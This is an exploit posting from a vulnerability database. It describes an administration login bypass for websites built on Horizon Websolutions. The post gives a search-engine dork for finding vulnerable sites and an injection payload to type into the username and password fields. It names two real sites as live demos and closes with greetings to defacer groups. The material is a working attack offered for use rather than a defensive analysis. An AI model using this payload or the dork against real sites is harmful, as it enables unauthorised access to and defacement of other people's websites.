Horizon Websolutions Administration Page Bypass

2019.01.16
id PacmanCorp (ID) id
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

[+] Exploit Title: Horizon Websolutions Administration Page Bypass [+] Author : XALVADOR_ [+] Google Dork : intext:"Powered by: Horizon Websolutions" [+] Exploit : '=''or' [+] Tested on : Linux, Windows 7 ======================================= [+] PoC : First, you are dorking on your search engine, if you are already dorking then select one of the webs and add it to url to site.com/admin. Example: http://www.al-aswak.com/admin and enter the exploit in the username and password. Note : Don't forget to enter the captcha xD [+] Demo : http://www.al-aswak.com/admin http://www.tem.com.lb/admin Greetz: ./Sn00py - Indonesia To World Team - N45HT - PacmanCorp - All Indonesian Defacers


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top